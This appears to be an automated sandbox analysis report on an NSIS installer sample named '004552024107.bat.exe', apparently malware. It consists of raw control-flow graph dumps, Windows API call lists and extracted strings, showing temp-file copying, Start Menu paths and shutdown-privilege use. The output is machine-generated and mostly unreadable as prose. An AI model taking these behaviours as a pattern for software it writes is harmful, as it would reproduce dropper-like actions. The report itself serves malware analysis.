401a2f 5347->5349 5348->5349 5350 401594 5351 4015a4 ShowWindow 5350->5351 5352 4015ab 5350->5352 5351->5352 5353 4015b9 ShowWindow 5352->5353 5354 402aea 5352->5354 5353->5354 5355 6d0e1058 5357 6d0e1074 5355->5357 5356 6d0e10dc 5357->5356 5358 6d0e1091 5357->5358 5359 6d0e154b GlobalFree 5357->5359 5360 6d0e154b GlobalFree 5358->5360 5359->5358 5361 6d0e10a1 5360->5361 5362 6d0e10a8 GlobalSize 5361->5362 5363 6d0e10b1 5361->5363 5362->5363 5364 6d0e10c6 5363->5364 5365 6d0e10b5 GlobalAlloc 5363->5365 5367 6d0e10d1 GlobalFree 5364->5367 5366 6d0e1572 3 API calls 5365->5366 5366->5364 5367->5356 4775 402318 4776 402c5e 21 API calls 4775->4776 4777 40231e 4776->4777 4778 402c5e 21 API calls 4777->4778 4779 402327 4778->4779 4780 402c5e 21 API calls 4779->4780 4781 402330 4780->4781 4782 406620 2 API calls 4781->4782 4783 402339 4782->4783 4784 40234a lstrlenA lstrlenA 4783->4784 4788 40233d 4783->4788 4786 4053d1 28 API calls 4784->4786 4785 4053d1 28 API calls 4789 402345 4785->4789 4787 402386 SHFileOperationA 4786->4787 4787->4788 4787->4789 4788->4785 4788->4789 5368 404498 5369 4044ae 5368->5369 5377 4045ba 5368->5377 5373 40432d 22 API calls 5369->5373 5370 404629 5371 4046f3 5370->5371 5372 404633 GetDlgItem 5370->5372 5379 404394 8 API calls 5371->5379 5375 4046b1 5372->5375 5376 404649 5372->5376 5374 404504 5373->5374 5378 40432d 22 API calls 5374->5378 5375->5371 5383 4046c3 5375->5383 5376->5375 5382 40466f SendMessageA LoadCursorA SetCursor 5376->5382 5377->5370 5377->5371 5380 4045fe GetDlgItem SendMessageA 5377->5380 5381 404511 CheckDlgButton 5378->5381 5394 4046ee 5379->5394 5401 40434f KiUserCallbackDispatcher 5380->5401 5399 40434f KiUserCallbackDispatcher 5381->5399 5405 40473c 5382->5405 5387 4046c9 SendMessageA 5383->5387 5388 4046da 5383->5388 5387->5388 5393 4046e0 SendMessageA 5388->5393 5388->5394 5389 404624 5402 404718 5389->5402 5391 40452f GetDlgItem 5400 404362 SendMessageA 5391->5400 5393->5394 5396 404545 SendMessageA 5397 404563 GetSysColor 5396->5397 5398 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5396->5398 5397->5398 5398->5394 5399->5391 5400->5396 5401->5389 5403 404726 5402->5403 5404 40472b SendMessageA 5402->5404 5403->5404 5404->5370 5408 405969 ShellExecuteExA 5405->5408 5407 4046a2 LoadCursorA SetCursor 5407->5375 5408->5407 5409 402198 5410 402c5e 21 API calls 5409->5410 5411 40219f 5410->5411 5412 402c5e 21 API calls 5411->5412 5413 4021a9 5412->5413 5414 402c5e 21 API calls 5413->5414 5415 4021b3 5414->5415 5416 402c5e 21 API calls 5415->5416 5417 4021c0 5416->5417 5418 402c5e 21 API calls 5417->5418 5419 4021ca 5418->5419 5420 40220c CoCreateInstance 5419->5420 5421 402c5e 21 API calls 5419->5421 5424 40222b 5420->5424 5426 4022d9 5420->5426 5421->5420 5422 401423 28 API calls 5423 40230f 5422->5423 5425 4022b9 MultiByteToWideChar 5424->5425 5424->5426 5425->5426 5426->5422 5426->5423 4790 40269a 4791 402c3c 21 API calls 4790->4791 4797 4026a4 4791->4797 4792 402712 4793 405e98 ReadFile 4793->4797 4794 402714 4799 4061eb wsprintfA 4794->4799 4796 402724 4796->4792 4798 40273a SetFilePointer 4796->4798 4797->4792 4797->4793 4797->4794 4797->4796 4798->4792 4799->4792 5427 40239a 5428 4023a1 5427->5428 5429 4023b4 5427->5429 5430 406320 21 API calls 5428->5430 5431 4023ae 5430->5431 5431->5429 5432 4059a3 MessageBoxIndirectA 5431->5432 5432->5429 5433 402a1b 5434 402a22 5433->5434 5435 402a6e 5433->5435 5438 402c3c 21 API calls 5434->5438 5439 402a6c 5434->5439 5436 4066b5 5 API calls 5435->5436 5437 402a75 5436->5437 5440 402c5e 21 API calls 5437->5440 5441 402a30 5438->5441 5442 402a7e 5440->5442 5443 402c3c 21 API calls 5441->5443 5442->5439 5451 4062e0 5442->5451 5445 402a3f 5443->5445 5450 4061eb wsprintfA 5445->5450 5447 402a8c 5447->5439 5455 4062ca 5447->5455 5450->5439 5452 4062eb 5451->5452 5453 40630e IIDFromString 5452->5453 5454 406307 5452->5454 5453->5447 5454->5447 5458 4062af WideCharToMultiByte 5455->5458 5457 402aad CoTaskMemFree 5457->5439 5458->5457 5459 40149d 5460 4023b4 5459->5460 5461 4014ab PostQuitMessage 5459->5461 5461->5460 5462 401f1e 5463 402c5e 21 API calls 5462->5463 5464 401f24 5463->5464 5465 402c5e 21 API calls 5464->5465 5466 401f2d 5465->5466 5467 402c5e 21 API calls 5466->5467 5468 401f36 5467->5468 5469 402c5e 21 API calls 5468->5469 5470 401f3f 5469->5470 5471 401423 28 API calls 5470->5471 5472 401f46 5471->5472 5479 405969 ShellExecuteExA 5472->5479 5474 401f81 5475 40672a 5 API calls 5474->5475 5476 4027ed 5474->5476 5477 401f9b CloseHandle 5475->5477 5477->5476 5479->5474 4820 401fa0 4821 402c5e 21 API calls 4820->4821 4822 401fa6 4821->4822 4823 4053d1 28 API calls 4822->4823 4824 401fb0 4823->4824 4825 405926 2 API calls 4824->4825 4826 401fb6 4825->4826 4827 401fd7 CloseHandle 4826->4827 4831 4027ed 4826->4831 4835 40672a WaitForSingleObject 4826->4835 4827->4831 4830 401fcb 4832 401fd0 4830->4832 4833 401fd9 4830->4833 4840 4061eb wsprintfA 4832->4840 4833->4827 4836 406744 4835->4836 4837 406756 GetExitCodeProcess 4836->4837 4838 4066f1 2 API calls 4836->4838 4837->4830 4839 40674b WaitForSingleObject 4838->4839 4839->4836 4840->4827 5480 402020 5481 402c5e 21 API calls 5480->5481 5482 402027 5481->5482 5483 4066b5 5 API calls 5482->5483 5484 402036 5483->5484 5485 40204e GlobalAlloc 5484->5485 5490 4020be 5484->5490 5486 402062 5485->5486 5485->5490 5487 4066b5 5 API calls 5486->5487 5488 402069 5487->5488 5489 4066b5 5 API calls 5488->5489 5491 402073 5489->5491 5491->5490 5495 4061eb wsprintfA 5491->5495 5493 4020ae 5496 4061eb wsprintfA 5493->5496 5495->5493 5496->5490 5497 401922 5498 401959 5497->5498 5499 402c5e 21 API calls 5498->5499 5500 40195e 5499->5500 5501 405a4f 71 API calls 5500->5501 5502 401967 5501->5502 4841 4024a3 4842 402c5e 21 API calls 4841->4842 4843 4024b5 4842->4843 4844 402c5e 21 API calls 4843->4844 4845 4024bf 4844->4845 4858 402cee 4845->4858 4848 402aea 4849 4024f4 4853 402c3c 21 API calls 4849->4853 4856 402500 4849->4856 4850 402c5e 21 API calls 4852 4024ed lstrlenA 4850->4852 4851 402522 RegSetValueExA 4855 402538 RegCloseKey 4851->4855 4852->4849 4853->4856 4854 403168 35 API calls 4854->4851 4855->4848 4856->4851 4856->4854 4859 402d09 4858->4859 4862 406141 4859->4862 4863 406150 4862->4863 4864 40615b RegCreateKeyExA 4863->4864 4865 4024cf 4863->4865 4864->4865 4865->4848 4865->4849 4865->4850 5503 401d23 5504 402c3c 21 API calls 5503->5504 5505 401d29 IsWindow 5504->5505 5506 401a33 5505->5506 5507 6d0e22ea 5508 6d0e2354 5507->5508 5509 6d0e235f GlobalAlloc 5508->5509 5510 6d0e237e 5508->5510 5509->5508 5511 401925 5512 402c5e 21 API calls 5511->5512 5513 40192c 5512->5513 5514 4059a3 MessageBoxIndirectA 5513->5514 5515 401935 5514->5515 5516 4027a5 5517 4027ab 5516->5517 5518 4027af FindNextFileA 5517->5518 5520 4027c1 5517->5520 5519 402800 5518->5519 5518->5520 5522 40628d lstrcpynA 5519->5522 5522->5520 4881 401bac 4882 401bb9 4881->4882 4883 401bfd 4881->4883 4886 401c41 4882->4886 4891 401bd0 4882->4891 4884 401c01 4883->4884 4885 401c26 GlobalAlloc 4883->4885 4894 4023b4 4884->4894 4902 40628d lstrcpynA 4884->4902 4888 406320 21 API calls 4885->4888 4887 406320 21 API calls 4886->4887 4886->4894 4890 4023ae 4887->4890 4888->4886 4890->4894 4895 4059a3 MessageBoxIndirectA 4890->4895 4900 40628d lstrcpynA 4891->4900 4892 401c13 GlobalFree 4892->4894 4895->4894 4896 401bdf 4901 40628d lstrcpynA 4896->4901 4898 401bee 4903 40628d lstrcpynA 4898->4903 4900->4896 4901->4898 4902->4892 4903->4894 5523 6d0e10e0 5532 6d0e1110 5523->5532 5524 6d0e129a GlobalFree 5525 6d0e11cd GlobalAlloc 5525->5532 5526 6d0e133d 2 API calls 5526->5532 5527 6d0e1295 5527->5524 5528 6d0e1286 GlobalFree 5528->5532 5529 6d0e12f6 2 API calls 5529->5532 5530 6d0e1165 GlobalAlloc 5530->5532 5531 6d0e1361 lstrcpyA 5531->5532 5532->5524 5532->5525 5532->5526 5532->5527 5532->5528 5532->5529 5532->5530 5532->5531 5533 6d0e1661 5534 6d0e154b GlobalFree 5533->5534 5536 6d0e1679 5534->5536 5535 6d0e16bf GlobalFree 5536->5535 5537 6d0e1694 5536->5537 5538 6d0e16ab VirtualFree 5536->5538 5537->5535 5538->5535 5539 4029af 5540 402c3c 21 API calls 5539->5540 5541 4029b5 5540->5541 5542 4027ed 5541->5542 5543 406320 21 API calls 5541->5543 5543->5542 5544 402631 5545 402c5e 21 API calls 5544->5545 5546 402638 5545->5546 5549 405e20 GetFileAttributesA CreateFileA 5546->5549 5548 402644 5549->5548 5550 404d32 GetDlgItem GetDlgItem 5551 404d88 7 API calls 5550->5551 5563 404faf 5550->5563 5552 404e30 DeleteObject 5551->5552 5553 404e24 SendMessageA 5551->5553 5554 404e3b 5552->5554 5553->5552 5556 404e72 5554->5556 5557 406320 21 API calls 5554->5557 5555 405091 5559 40513d 5555->5559 5560 404fa2 5555->5560 5566 4050ea SendMessageA 5555->5566 5558 40432d 22 API calls 5556->5558 5564 404e54 SendMessageA SendMessageA 5557->5564 5565 404e86 5558->5565 5561 405147 SendMessageA 5559->5561 5562 40514f 5559->5562 5568 404394 8 API calls 5560->5568 5561->5562 5574 405161 ImageList_Destroy 5562->5574 5575 405168 5562->5575 5579 405178 5562->5579 5563->5555 5569 404c80 5 API calls 5563->5569 5582 40501e 5563->5582 5564->5554 5570 40432d 22 API calls 5565->5570 5566->5560 5572 4050ff SendMessageA 5566->5572 5567 405083 SendMessageA 5567->5555 5573 40533e 5568->5573 5569->5582 5583 404e97 5570->5583 5571 4052f2 5571->5560 5580 405304 ShowWindow GetDlgItem ShowWindow 5571->5580 5577 405112 5572->5577 5574->5575 5578 405171 GlobalFree 5575->5578 5575->5579 5576 404f71 GetWindowLongA SetWindowLongA 5581 404f8a 5576->5581 5588 405123 SendMessageA 5577->5588 5578->5579 5579->5571 5593 404d00 4 API calls 5579->5593 5598 4051b3 5579->5598 5580->5560 5584 404fa7 5581->5584 5585 404f8f ShowWindow 5581->5585 5582->5555 5582->5567 5583->5576 5587 404ee9 SendMessageA 5583->5587 5589 404f6c 5583->5589 5591 404f27 SendMessageA 5583->5591 5592 404f3b SendMessageA 5583->5592 5603 404362 SendMessageA 5584->5603 5602 404362 SendMessageA 5585->5602 5587->5583 5588->5559 5589->5576 5589->5581 5591->5583 5592->5583 5593->5598 5594 4051f7 5595 4052bd 5594->5595 5601 40526b SendMessageA SendMessageA 5594->5601 5596 4052c8 InvalidateRect 5595->5596 5599 4052d4 5595->5599 5596->5599 5597 4051e1 SendMessageA 5597->5594 5598->5594 5598->5597 5599->5571 5604 404c3b 5599->5604 5601->5594 5602->5560 5603->5563 5607 404b76 5604->5607 5606 404c50 5606->5571 5608 404b8c 5607->5608 5609 406320 21 API calls 5608->5609 5610 404bf0 5609->5610 5611 406320 21 API calls 5610->5611 5612 404bfb 5611->5612 5613 406320 21 API calls 5612->5613 5614 404c11 lstrlenA wsprintfA SetDlgItemTextA 5613->5614 5614->5606 4904 403e33 4905 403e4b 4904->4905 4906 403fac 4904->4906 4905->4906 4907 403e57 4905->4907 4908 403ffd 4906->4908 4909 403fbd GetDlgItem GetDlgItem 4906->4909 4910 403e62 SetWindowPos 4907->4910 4911 403e75 4907->4911 4913 404057 4908->4913 4924 401389 2 API calls 4908->4924 4912 40432d 22 API calls 4909->4912 4910->4911 4915 403ec0 4911->4915 4916 403e7e ShowWindow 4911->4916 4917 403fe7 SetClassLongA 4912->4917 4914 404379 SendMessageA 4913->4914 4918 403fa7 4913->4918 4946 404069 4914->4946 4921 403ec8 DestroyWindow 4915->4921 4922 403edf 4915->4922 4919 403f99 4916->4919 4920 403e9e GetWindowLongA 4916->4920 4923 40140b 2 API calls 4917->4923 4925 404394 8 API calls 4919->4925 4920->4919 4926 403eb7 ShowWindow 4920->4926 4976 4042b6 4921->4976 4927 403ee4 SetWindowLongA 4922->4927 4928 403ef5 4922->4928 4923->4908 4929 40402f 4924->4929 4925->4918 4926->4915 4927->4918 4928->4919 4933 403f01 GetDlgItem 4928->4933 4929->4913 4930 404033 SendMessageA 4929->4930 4930->4918 4931 40140b 2 API calls 4931->4946 4932 4042b8 DestroyWindow EndDialog 4932->4976 4935 403f12 SendMessageA IsWindowEnabled 4933->4935 4936 403f2f 4933->4936 4934 4042e7 ShowWindow 4934->4918 4935->4918 4935->4936 4938 403f3c 4936->4938 4939 403f83 SendMessageA 4936->4939 4940 403f4f 4936->4940 4949 403f34 4936->4949 4937 406320 21 API calls 4937->4946 4938->4939 4938->4949 4939->4919 4943 403f57 4940->4943 4944 403f6c 4940->4944 4941 404306 SendMessageA 4945 403f6a 4941->4945 4942 40432d 22 API calls 4942->4946 4947 40140b 2 API calls 4943->4947 4948 40140b 2 API calls 4944->4948 4945->4919 4946->4918 4946->4931 4946->4932 4946->4937 4946->4942 4951 40432d 22 API calls 4946->4951 4967 4041f8 DestroyWindow 4946->4967 4947->4949 4950 403f73 4948->4950 4949->4941 4950->4919 4950->4949 4952 4040e4 GetDlgItem 4951->4952 4953 404101 ShowWindow KiUserCallbackDispatcher 4952->4953 4954 4040f9 4952->4954 4977 40434f KiUserCallbackDispatcher 4953->4977 4954->4953 4956 40412b EnableWindow 4961 40413f 4956->4961 4957 404144 GetSystemMenu EnableMenuItem SendMessageA 4958 404174 SendMessageA 4957->4958 4957->4961 4958->4961 4960 403e14 22 API calls 4960->4961 4961->4957 4961->4960 4978 404362 SendMessageA 4961->4978 4979 40628d lstrcpynA 4961->4979 4963 4041a3 lstrlenA 4964 406320 21 API calls 4963->4964 4965 4041b4 SetWindowTextA 4964->4965 4966 401389 2 API calls 4965->4966 4966->4946 4968 404212 CreateDialogParamA 4967->4968 4967->4976 4969 404245 4968->4969 4968->4976 4970 40432d 22 API calls 4969->4970 4971 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4970->4971 4972 401389 2 API calls 4971->4972 4973 404296 4972->4973 4973->4918 4974 40429e ShowWindow 4973->4974 4975 404379 SendMessageA 4974->4975 4975->4976 4976->4918 4976->4934 4977->4956 4978->4961 4979->4963 4980 4025b5 4981 402c9e 21 API calls 4980->4981 4982 4025bf 4981->4982 4983 402c3c 21 API calls 4982->4983 4984 4025c8 4983->4984 4985 4025d6 4984->4985 4988 4027ed 4984->4988 4986 4025e3 RegEnumKeyA 4985->4986 4987 4025ef RegEnumValueA 4985->4987 4989 40260b RegCloseKey 4986->4989 4987->4989 4990 402604 4987->4990 4989->4988 4990->4989 5615 4014b7 5616 4014bd 5615->5616 5617 401389 2 API calls 5616->5617 5618 4014c5 5617->5618 5619 6d0e2c73 5620 6d0e2c8b 5619->5620 5621 6d0e15c4 2 API calls 5620->5621 5622 6d0e2ca6 5621->5622 5623 4047bf 5624 4047eb 5623->5624 5625 4047fc 5623->5625 5684 405987 GetDlgItemTextA 5624->5684 5627 404808 GetDlgItem 5625->5627 5630 404867 5625->5630 5629 40481c 5627->5629 5628 4047f6 5631 406587 5 API calls 5628->5631 5633 404830 SetWindowTextA 5629->5633 5638 405cb8 4 API calls 5629->5638 5634 406320 21 API calls 5630->5634 5645 40494b 5630->5645 5682 404af5 5630->5682 5631->5625 5636 40432d 22 API calls 5633->5636 5639 4048db SHBrowseForFolderA 5634->5639 5635 40497b 5640 405d0d 18 API calls 5635->5640 5641 40484c 5636->5641 5637 404394 8 API calls 5642 404b09 5637->5642 5643 404826 5638->5643 5644 4048f3 CoTaskMemFree 5639->5644 5639->5645 5646 404981 5640->5646 5647 40432d 22 API calls 5641->5647 5643->5633 5650 405c1f 3 API calls 5643->5650 5648 405c1f 3 API calls 5644->5648 5645->5682 5686 405987 GetDlgItemTextA 5645->5686 5687 40628d lstrcpynA 5646->5687 5649 40485a 5647->5649 5651 404900 5648->5651 5685 404362 SendMessageA 5649->5685 5650->5633 5654 404937 SetDlgItemTextA 5651->5654 5659 406320 21 API calls 5651->5659 5654->5645 5655 404860 5657 4066b5 5 API calls 5655->5657 5656 404998 5658 4066b5 5 API calls 5656->5658 5657->5630 5666 40499f 5658->5666 5660 40491f lstrcmpiA 5659->5660 5660->5654 5663 404930 lstrcatA 5660->5663 5661 4049db 5688 40628d lstrcpynA 5661->5688 5663->5654 5664 4049e2 5665 405cb8 4 API calls 5664->5665 5667 4049e8 GetDiskFreeSpaceA 5665->5667 5666->5661 5669 405c66 2 API calls 5666->5669 5671 404a33 5666->5671 5670 404a0c MulDiv 5667->5670 5667->5671 5669->5666 5670->5671 5672 404aa4 5671->5672 5673 404c3b 24 API calls 5671->5673 5674 404ac7 5672->5674 5676 40140b 2 API calls 5672->5676 5675 404a91 5673->5675 5689 40434f KiUserCallbackDispatcher 5674->5689 5678 404aa6 SetDlgItemTextA 5675->5678 5679 404a96 5675->5679 5676->5674 5678->5672 5681 404b76 24 API calls 5679->5681 5680 404ae3 5680->5682 5683 404718 SendMessageA 5680->5683 5681->5672 5682->5637 5683->5682 5684->5628 5685->5655 5686->5635 5687->5656 5688->5664 5689->5680

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 7 403490 5->7 8 40347f-40348e 5->8 9 4034a5-4034e5 6->9 10 40349d 6->10 7->6 8->6 11 4034e7-4034ef call 4066b5 9->11 12 4034f8 9->12 10->9 11->12 18 4034f1 11->18 13 4034fd-403511 call 406647 lstrlenA 12->13 19 403513-40352f call 4066b5 * 3 13->19 18->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 32 403539 27->32 32->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 45 4035d7-4035d8 42->45 46 4035dc-4035df 42->46 50 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->50 51 40370f-403727 DeleteFileA call 402f31 43->51 45->46 48 403670-40367c call 405c4a 46->48 49 4035e5-4035e9 46->49 48->38 67 40367e 48->67 53 403601-40362e 49->53 54 4035eb-4035f1 49->54 50->51 68 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 50->68 69 4037ba-4037cb call 4039bc OleUninitialize 51->69 70 40372d-403733 51->70 58 403640-40366e 53->58 59 403630-403636 53->59 55 4035f3-4035f5 54->55 56 4035f7 54->56 55->53 55->56 56->53 58->48 65 40368b-403698 call 40628d 58->65 63 403638-40363a 59->63 64 40363c 59->64 63->58 63->64 64->58 65->43 67->38 68->51 68->69 80 4037d1-4037e0 call 4059a3 ExitProcess 69->80 81 403928-40392e 69->81 73 403735-403740 call 405c4a 70->73 74 4037ab-4037b2 call 403a96 70->74 87 403742-40376b 73->87 88 403776-40377f 73->88 82 4037b7 74->82 85 403930-403945 GetCurrentProcess OpenProcessToken 81->85 86 4039a6-4039ae 81->86 82->69 95 403976-403984 call 4066b5 85->95 96 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 85->96 93 4039b0 86->93 94 4039b3-4039b6 ExitProcess 86->94 89 40376d-40376f 87->89 91 403781-40378f call 405d0d 88->91 92 4037e6-40380a call 40590e lstrlenA call 40628d 88->92 89->88 97 403771-403774 89->97 91->69 106 403791-4037a7 call 40628d * 2 91->106 114 40381b-403830 92->114 115 40380c-403816 call 40628d 92->115 93->94 104 403992-40399d ExitWindowsEx 95->104 105 403986-403990 95->105 96->95 97->88 97->89 104->86 108 40399f-4039a1 call 40140b 104->108 105->104 105->108 106->74 108->86 118 403835 114->118 115->114 120 403839-403865 wsprintfA call 406320 118->120 123 403867-40386c call 405897 120->123 124 40386e call 4058f1 120->124 128 403873-403875 123->128 124->128 129 403877-403881 GetFileAttributesA 128->129 130 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 128->130 131 4038a0-4038a8 129->131 132 403883-40388c DeleteFileA 129->132 130->69 137 4038d4-4038f5 call 406066 call 406320 call 405926 130->137 131->118 135 4038aa 131->135 132->131 134 40388e-40389e call 405a4f 132->134 134->120 134->131 135->69 146 4038f7-4038ff 137->146 147 403918-403923 CloseHandle 137->147 146->69 148 403905-40390d call 406620 146->148 147->69 148->120 151 403913 148->151 151->69
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                            • GetVersionExA.KERNEL32(?), ref: 00403424
                                            • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                            • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                            • OleInitialize.OLE32(00000000), ref: 00403548
                                            • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                            • GetCommandLineA.KERNEL32(prophetess Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\004552024107.bat.exe",00000020,"C:\Users\user\Desktop\004552024107.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                            • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                            • ExitProcess.KERNEL32 ref: 004037E0
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                            • wsprintfA.USER32 ref: 00403846
                                            • GetFileAttributesA.KERNEL32(00431400,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 00403878
                                            • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 004038B0
                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\004552024107.bat.exe,00431400,00000001), ref: 004038C6
                                            • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                            • ExitProcess.KERNEL32 ref: 004039B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                            • String ID: "$"C:\Users\user\Desktop\004552024107.bat.exe"$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11$C:\Users\user\Desktop$C:\Users\user\Desktop\004552024107.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$prophetess Setup$~nsu%X.tmp
                                            • API String ID: 2956269667-2512015699
                                            • Opcode ID: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                            • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                            • Opcode Fuzzy Hash: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                            • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 152 40550f-40552b 153 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 152->153 154 4056ba-4056c0 152->154 172 405616-405619 153->172 173 4055fa-405614 SendMessageA * 2 153->173 156 4056c2-4056e4 GetDlgItem CreateThread FindCloseChangeNotification 154->156 157 4056ea-4056f6 154->157 156->157 159 405718-40571e 157->159 160 4056f8-4056fe 157->160 164 405720-405726 159->164 165 405773-405776 159->165 162 405700-405713 ShowWindow * 2 call 404362 160->162 163 405739-405740 call 404394 160->163 162->159 176 405745-405749 163->176 169 405728-405734 call 404306 164->169 170 40574c-40575c ShowWindow 164->170 165->163 167 405778-40577e 165->167 167->163 174 405780-405793 SendMessageA 167->174 169->163 177 40576c-40576e call 404306 170->177 178 40575e-405767 call 4053d1 170->178 181 405629-405640 call 40432d 172->181 182 40561b-405627 SendMessageA 172->182 173->172 183 405890-405892 174->183 184 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 174->184 177->165 178->177 191 405642-405656 ShowWindow 181->191 192 405676-405697 GetDlgItem SendMessageA 181->192 182->181 183->176 189 4057c7-4057d7 GetWindowRect 184->189 190 4057da-4057f0 TrackPopupMenu 184->190 189->190 190->183 194 4057f6-405810 190->194 195 405665 191->195 196 405658-405663 ShowWindow 191->196 192->183 193 40569d-4056b5 SendMessageA * 2 192->193 193->183 197 405815-405830 SendMessageA 194->197 198 40566b-405671 call 404362 195->198 196->198 197->197 199 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 197->199 198->192 201 405854-405874 SendMessageA 199->201 201->201 202 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 201->202 202->183
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                            • GetClientRect.USER32(?,?), ref: 004055BA
                                            • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
